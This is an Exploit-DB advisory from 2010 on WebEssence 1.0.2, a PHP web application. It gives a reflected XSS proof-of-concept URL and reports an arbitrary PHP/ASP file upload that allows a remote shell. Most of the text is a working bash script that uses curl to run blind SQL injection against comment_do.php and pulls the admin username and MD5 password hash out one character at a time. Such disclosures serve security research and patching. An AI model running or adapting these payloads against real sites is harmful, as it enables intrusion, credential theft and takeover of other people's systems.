webessence 1.0.2 - Multiple Vulnerabilities

EDB-ID:

12387

CVE:



Author:

r00t

Type:

webapps


Platform:

PHP

Date:

2010-04-25


#
# WebEssence 1.0.2 Multiple Vulnerabilities
#
# Bugs found by white_sheep, r00t and epicfail
# for Debug|Track session @ Backtrack|italia community conference
# www.backtrack.it
# 
# # # # # # # # # XSS # # # # # # # # # # # # 
# PoC:
# http://localhost/webessence/webessence/oembed.php?url=http://google.com&id=<script>alert('Backtrack|it');</script>
# In "url" variable is possible to inject a remote HTML page
# 
# # # # # # Remote Shell Uplaod # # # # # # # 
# PoC: (thanks to emgent)
# Unprivileged registered user can upload any PHP or ASP file that can be found in "uploads/other/"
#
# # # # # Remote Blind Sql Injection # # # # #

#!/bin/bash

query1="1/**/AND/**/CHAR("
query2=")=(SELECT/**/SUBSTRING(name,"
query3=",1)/**/FROM/**/users)"
url=$1
path=$2

if [ "$1" == "" || "$2" == ""  ]
then
	echo "Usage: $0 [url] [path]"
	echo "Example: $0 http://localhost /webessence"
	exit
fi

good=0
position=1

#SEARCH USERNAME
echo -n "Username: "
while [ $good -lt 1 ]
do
	found="false"
	for name in `seq 97 122`
	do
		NOW=`curl -s -d "name=Ph33r&url=&email=&comment=Ph33r&itemid=$query1$name$query2$position$query3" -H "Referer: $url$path" -H "Content-Type: application/x-www-form-urlencoded" $url$path/comment_do.php`
		if [ "$NOW" == ""  ]
		then
			let position+=1
			found="true"
			perl -e "printf '%c', $name;"
			continue
		fi

	done
	if [ "$found" == "false" ]
	then
		good=1
	fi
done

good=0
position=1
query2=")=(SELECT/**/SUBSTRING(pwd,"
pwd_chr="48 49 50 51 52 53 54 55 56 57 97 98 99 100 101 102"

#SEARCH PASSWORD
echo ""
echo -n "MD5 Pass: "                                                                                                                                         
while [ $good -lt 1 ]                                                                                                                                        
do                                                                                                                                                           
        found="false"                                                                                                                                        
        for pwd in $pwd_chr                                                                                                                             
        do                                                                                                                                                   
                NOW=`curl -s -d "name=Ph33r&url=&email=&comment=Ph33r&itemid=$query1$pwd$query2$position$query3" -H "Referer: $url$path" -H "Content-Type: application/x-www-form-urlencoded" $url$path/comment_do.php`                                                                                                  
		if [ "$NOW" == ""  ]                                                                                                                         
                then                                                                                                                                         
                        let position+=1                                                                                                                      
                        found="true"                                                                                                                         
                        perl -e "printf '%c', $pwd;"
                        continue                                                                                                                             
                fi                                                                                                                                           
                                                                                                                                                             
        done                                                                                                                                                 
        if [ "$found" == "false" ]                                                                                                                           
        then                                                                                                                                                 
                good=1                                                                                                                                       
        fi                                                                                                                                                   
done
echo ""